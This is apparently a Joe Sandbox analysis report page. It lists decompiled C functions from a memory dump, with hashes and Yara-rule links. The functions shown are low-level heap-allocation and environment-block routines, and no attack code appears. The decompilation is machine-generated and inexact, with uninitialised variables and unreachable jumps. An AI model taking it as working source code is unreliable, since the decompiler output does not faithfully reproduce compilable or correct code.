Instruction Fuzzy Hash: 27E0E5723519007BE7219E09CD80B0336699FC2724F01407CB5001E282DAE5EC088BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0460746D Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0460746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E045FEB70(__ecx, 0x46d79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E046295D0();
							L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x0460746d
0x0460746d
0x0460746d
0x04607471
0x04607488
0x0464f92d
0x0460748e
0x04607491
0x04607495
0x0464f937
0x0464f93a
0x0464f94e
0x0464f953
0x0464f956
0x0464f956
0x04607495
0x00000000
0x04607488
0x04607473
0x04607478
0x0460747d
0x04607481
0x00000000
0x04607481
0x0460747d
0x0460747a
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a1d05673d2bcb4d1fc60c50de0c0361a54d752a73489eae7b57bc85af56740
Instruction ID: a714dd3925f1c9a4e1a830ac311a1568dd0d5b3a4f3cc6b86be87f6e0c357e9d
Opcode Fuzzy Hash: 68a1d05673d2bcb4d1fc60c50de0c0361a54d752a73489eae7b57bc85af56740
Instruction Fuzzy Hash: 6CF0B434A00345AADF099F68C840B7B7B61AF54356F048515D451AB2E0F765B801DB85

Uniqueness

Uniqueness Score: -1.00%

Function 046B8CD6 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E046B8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x46dd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04607D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0462B640(E04629AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x046b8ce5
0x046b8ced
0x046b8cf0
0x046b8cfb
0x046b8d0d
0x046b8cfd
0x046b8d06
0x046b8d06
0x046b8d18
0x046b8d19
0x046b8d1b
0x046b8d20
0x046b8d33

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25ba815924929cc3171412ad81f94b6ed9fdf3c6a9ee37e54428b6bbf823cece
Instruction ID: 5022156d2362d318a4192eabbbd40ae1063328c14996bf15b0713d8f5db1fbee
Opcode Fuzzy Hash: 25ba815924929cc3171412ad81f94b6ed9fdf3c6a9ee37e54428b6bbf823cece
Instruction Fuzzy Hash: B0F08970A05618ABDB04EBA8D555DAE77B8EF55304F10015AE955EB3C0F934F900C758

Uniqueness

Uniqueness Score: -1.00%

Function 045E4F2E Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045E4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E046B88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0460C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x45c1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x045e4f2e
0x045e4f34
0x045e4f38
0x04640b85
0x04640b85
0x04640b89
0x04640b9a
0x04640b9a
0x04640b9f
0x00000000
0x04640b9f
0x04640b94
0x04640b98
0x00000000
0x00000000
0x00000000
0x04640b98
0x045e4f3e
0x045e4f48
0x00000000
0x045e4f6e
0x00000000
0x045e4f70

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 078065b81d9d0a29c23b73c701a94930dc8230d3b217746353699857f39b4aba
Instruction ID: 070cb181a1118566eef9e55d4402196bf35814dbe13c60a0102c16e34090f9bf
Opcode Fuzzy Hash: 078065b81d9d0a29c23b73c701a94930dc8230d3b217746353699857f39b4aba
Instruction Fuzzy Hash: 24F0E2335216A5CFEB71EB18C144B22B7D8AB607B8F449468D50587B21E725FC80C688

Uniqueness

Uniqueness Score: -1.00%

Function 046B8B58 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E046B8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x46dd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04607D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0462B640(E04629AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x046b8b67
0x046b8b6f
0x046b8b72
0x046b8b7d
0x046b8b8f
0x046b8b7f
0x046b8b88
0x046b8b88
0x046b8b9a
0x046b8b9b
0x046b8b9d
0x046b8ba2
0x046b8bb5

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2a75fd5125f58bdea54bae90c747d63bc529e3bf08dbc2de159ff9776a52f34
Instruction ID: b45dd4eee6db3d1cc04d7fda43f44a35560ee40e446de09ee7a0184ff300b4b0
Opcode Fuzzy Hash: a2a75fd5125f58bdea54bae90c747d63bc529e3bf08dbc2de159ff9776a52f34
Instruction Fuzzy Hash: DEF082B0B04658ABEB14EBB8DA06E6E73B8EF04704F040459B905DB3C1FA34F900C798

Uniqueness

Uniqueness Score: -1.00%

Function 0461A44B Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0461A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x46d7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L04604620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0462FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x0461a44b
0x0461a453
0x0461a472
0x0461a476
0x00000000
0x0461a493
0x0461a47a
0x0461a47f
0x0461a486
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbaee12ae49be217d4806718e67f52743ac760d5caf558c1e8c2a44ce8a93665
Instruction ID: b5aa4467aebb7875647914e9673f05dab93734df007ac2a401af986b711c14ee
Opcode Fuzzy Hash: bbaee12ae49be217d4806718e67f52743ac760d5caf558c1e8c2a44ce8a93665
Instruction Fuzzy Hash: 75E09272B02821ABD3215E58AD00F6773ADDBE4B55F094039F504C7260FA28ED02C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 045EF358 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E045EF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0461F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L04604620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x045ef35d
0x045ef361
0x045ef367
0x045ef372
0x045ef38c
0x045ef38c
0x045ef394

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: 2d43de3091d7809fb0ba42da2a7c40bd2e5f9b6f1a3571b0f85fb11aaac332c7
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: F0E0D833A40118BBDB3596D9EE05F6BBBACEB48B60F0441D6B904D7190E960AD00D6D0

Uniqueness

Uniqueness Score: -1.00%

Function 045FFF60 Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045FFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x45c11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E046B88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E04600050(_t14);
				}
			}

0x045fff66
0x045fff6b
0x00000000
0x045fff8f
0x00000000
0x045fff8f

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98268a1c6f4cdcc1c75dfac1c0505d00ce78acb45996a478331887843bf53c86
Instruction ID: 5a8617e9aa6caf29de4c7a5692d4d7297abd76f4aa973445b3f9fae5f97304e6
Opcode Fuzzy Hash: 98268a1c6f4cdcc1c75dfac1c0505d00ce78acb45996a478331887843bf53c86
Instruction Fuzzy Hash: 23E0DFB22052049FE734DF52EC80F26379EBB42725F19841FE1084B902E621F880E74B

Uniqueness

Uniqueness Score: -1.00%

Function 046741E8 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E046741E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x46c08f0);
				_t5 = E0463D08C(__ebx, __edi, __esi);
				if( *0x46d87ec == 0) {
					E045FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x46d87ec == 0) {
						 *0x46d87f0 = 0x46d87ec;
						 *0x46d87ec = 0x46d87ec;
						 *0x46d87e8 = 0x46d87e4;
						 *0x46d87e4 = 0x46d87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L04674248();
				}
				return E0463D0D1(_t5);
			}

0x046741e8
0x046741ea
0x046741ef
0x046741fb
0x04674206
0x0467420b
0x04674216
0x0467421d
0x04674222
0x0467422c
0x04674231
0x04674231
0x04674236
0x0467423d
0x0467423d
0x04674247

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4095cf9419d00a4cf11e76c5dc1fbd84a5142c9e9c4d9d7afbcce411d96939eb
Instruction ID: 03dad4ff17347a7cecfa60e0aead7e65faf90c72ba6c780799bd9991b744359d
Opcode Fuzzy Hash: 4095cf9419d00a4cf11e76c5dc1fbd84a5142c9e9c4d9d7afbcce411d96939eb
Instruction Fuzzy Hash: CFF0F274D12742EEEBA2FFAAA50C79836A4F744719F00611A9220C7284FB386884CF05

Uniqueness

Uniqueness Score: -1.00%

Function 0469D380 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0469D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L045EE8B0(__ecx, _a4, 0xfff);
					L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0469d38a
0x0469d39b
0x0469d3b1
0x00000000
0x0469d3b6
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 051481da19a67ff89721886ecb4cd513179afe6f7c0e8ccfb5f8ef4ae3e757c9
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 71E0C231284604FBEF225E44CC00F797B5AEB507A6F104031FE085A7D0DAB9BC92E6C4

Uniqueness

Uniqueness Score: -1.00%

Function 0461A185 Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0461A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x46d67e4 >= 0xa) {
					if(_t5 < 0x46d6800 || _t5 >= 0x46d6900) {
						return L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04600010(0x46d67e0, _t5);
				}
			}

0x0461a190
0x0461a1a6
0x0461a1c2
0x00000000
0x00000000
0x00000000
0x0461a192
0x0461a192
0x0461a19f
0x0461a19f

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c8fce61b98fc6a315a230b7e88c2e9157cffdf2e4d644b3d08b73402d908e61
Instruction ID: 6a99b8a008494f27a57cb620f9d4a10f51524bad1399ac466c81604a6a5b82f2
Opcode Fuzzy Hash: 7c8fce61b98fc6a315a230b7e88c2e9157cffdf2e4d644b3d08b73402d908e61
Instruction Fuzzy Hash: 86D02E21A630401AF72C2B80E915B622222E78072CF348C0CF2038AAF1FA60FCD4810C

Uniqueness

Uniqueness Score: -1.00%

Function 046116E0 Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E046116E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04611710(0x46d67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04604620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x046116e8
0x046116ef
0x046116f3
0x046116fe
0x00000000
0x04611700
0x0461170d
0x0461170d
0x046116f2
0x046116f2
0x046116f2
0x046116f2

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bda515bea7cbbdebf8cb8cb2571316803513da3ef91090ad4852f2e8b56b1baf
Instruction ID: 59adf095a98a40fa8f48d6e3291488ba6d75e10eb4534cdc7859ca4ccf34fce2
Opcode Fuzzy Hash: bda515bea7cbbdebf8cb8cb2571316803513da3ef91090ad4852f2e8b56b1baf
Instruction Fuzzy Hash: 93D0A73130010192FA2D5B109824B552251DB95789F3C005CF317595E1FFA1FC92E48C

Uniqueness

Uniqueness Score: -1.00%

Function 046653CA Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E046653CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E045FEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x046653ca
0x046653ce
0x046653d9
0x046653de
0x046653e1
0x046653e1
0x046653e6
0x046653f3
0x00000000
0x046653f8
0x046653fb

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: ef761a590d4f9feff957876df2d2306a4db83ea714e2c9755ee111ac19247600
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 19E08C31940680ABCF12DB48CA50F4EB7F5FB84B40F140408A00A6F761D624BC00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 046135A1 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E046135A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E045FEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x046135a1
0x046135a1
0x046135a5
0x046135ab
0x046135ab
0x046135b5
0x00000000
0x046135c1
0x046135b7

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: d4fa926fcbbd4ba2b967b59d12c724be4e35f9b1e39bae5a314a78dcc38589bd
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: BED0A9315111809EFB01AB10C21876837B3BB00B08F5CA069C8030EB7AE33A6E8AE601

Uniqueness

Uniqueness Score: -1.00%

Function 045FAAB0 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045FAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x045faab6
0x045faabb
0x0464a442
0x00000000
0x0464a448
0x0464a454
0x0464a454
0x045faac1
0x045faac1
0x045faac6
0x045faac6

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: ca0e888646bd61b32071ce51fe831f72f8bf9d5f413c6bbb4220e80ef132e247
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: C2D0E935352A80DFD717DF5DC954B1573A4BB44B44FC50490E545CBB61E62CED44CA11

Uniqueness

Uniqueness Score: -1.00%

Function 0466A537 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0466A537(intOrPtr _a4, intOrPtr _a8) {

				return L04608E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0466a553

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 36c3aca0bbe5e5880055bb5cfaf4dba35774d4f2780ce2a39fc6fc7944f094ae
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: D1C01232080648BBCB12AF81CC00F067B2AEB94B60F008014BA080B5A08632E9B0EA88

Uniqueness

Uniqueness Score: -1.00%

Function 045EDB40 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045EDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L04604620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x045edb4d
0x045edb54
0x045edb5f
0x045edb56
0x045edb56
0x045edb5c
0x045edb5c

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: c101b275f033dbaf7e62b21cf25257c566461192266e932e7b233bff6ad4e120
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 26C08C303A0A01AAEB3A1F20CE01B1136A5BB00B45F4400A06300DA0F0FF78EC01EA00

Uniqueness

Uniqueness Score: -1.00%

Function 045EAD30 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045EAD30(intOrPtr _a4) {

				return L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x045ead49

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: bd7f9a3dd7d6b955fea826d4a389eb67630aa82949af5bb1686e78de888a48bd
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 27C08C320C0248BBC7126A45CD00F027B29E790BA0F004020F6040A6A28932F860D588

Uniqueness

Uniqueness Score: -1.00%

Function 046136CC Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E046136CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04604620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x046136d2
0x046136e8
0x046136d4
0x046136e5
0x046136e5

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

